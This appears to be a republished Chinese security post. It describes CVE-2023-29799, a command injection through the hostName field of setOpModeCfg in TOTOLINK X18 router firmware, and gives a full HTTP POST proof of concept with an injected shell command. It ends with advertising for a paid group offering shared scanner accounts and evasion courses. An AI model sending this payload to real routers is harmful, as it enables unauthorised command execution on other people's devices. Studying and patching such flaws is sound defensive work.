免责声明
由于传播、利用WK安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负
责,WK安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除
并致歉。谢谢!
0X01 漏洞介绍
TOTOLINK X18是中国吉翁电子(TOTOLINK)公司的一款无线路由器,它采用了最新的Wi-Fi 6标准,支持5GHz和2.4GHz双频段。
CVE-2023-29799通过 setOpModeCfg 函数中的主机名参数存在命令注入漏洞。
0x02 影响版本
TOTOLINK:X18 V9.1.0cu.2024_B20220329
TOTOLINK:X18 V9.1.0cu.2021_B20220326
0x03 漏洞分析
产品首页
cstecgi.cgi中的setOpModeCfg的hostName参数是可控制的,并且没有验证输入的hostName参数,但在绕过协议条件后才能使用。设置proto! = 0 4 6 8以触发以下注入代码。
CsteSystem来自/usr/lib/libcscommon.so。通过分析,您可以知道该命令最终将通过调用/bin/bash来执行execv函数。
POC:
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.109.161
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 61
Origin: http://192.168.109.161
Connection: close
Referer: http://192.168.109.161/basic/mesh.html?timestamp=1667781517612
Cookie: SESSION_ID=2:1667781512:2
{"hostName": "1'|id\n","proto":"7","topicurl":"setOpModeCfg"}
参考链接
https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/226/ids/36.html?__K=35571add4a0028057e692cc05fa09f8a11689413384_518676754
https://sore-pail-31b.notion.site/Command-Inject-6-3ee0faa243134ae2bc20e6670d80bada
湘安无事团队 知识星球 一次付费,永久免费,享受两大内部群+星球双重福利(付费之后会拉入内部成员群,直接免费续上)。有需要的直接添加上面微信 118永久,私我支付,直接拉内部成员群,扫码支付,三天后拉内部成员群。
内部群共享
1.fofa高级会员账号
2.360quake高级会员
3.某在线高级会员靶场账号(附带wp)
4.专属内部漏洞库(持续更新)
5.原创漏洞挖掘报告
6.it课表众多好课(持续更新,内容涉及安全+开发等)
7.在线答疑,不定期直播技术分享【湘南第一深情、wuli等】
8.源码网站永久会员共享
星球介绍:
星球针对安全新人有优秀学习资源,星球专属嘉宾进行问题解答,
性价比很高。
如果你是入门不久,想要提升漏洞挖掘能力,那该星球是个不错的选择,星球内拥有
专属漏洞报告,
各种奇淫技巧、挖洞技术、专属嘉宾在线问答等。
欢迎您的加入,星球部分内容请你查看!!
星球内容介绍
星球内部提供众多好课
安全类:web安全、内网、src挖掘、kail、逆向、游戏漏洞挖掘、免杀等
开发类:python安全开发、java、Golang、php等开发课程
专栏提供内部漏洞库
专栏内容预览
扫码查看更多内容
文章引用微信公众号"WK安全",如有侵权,请联系管理员删除!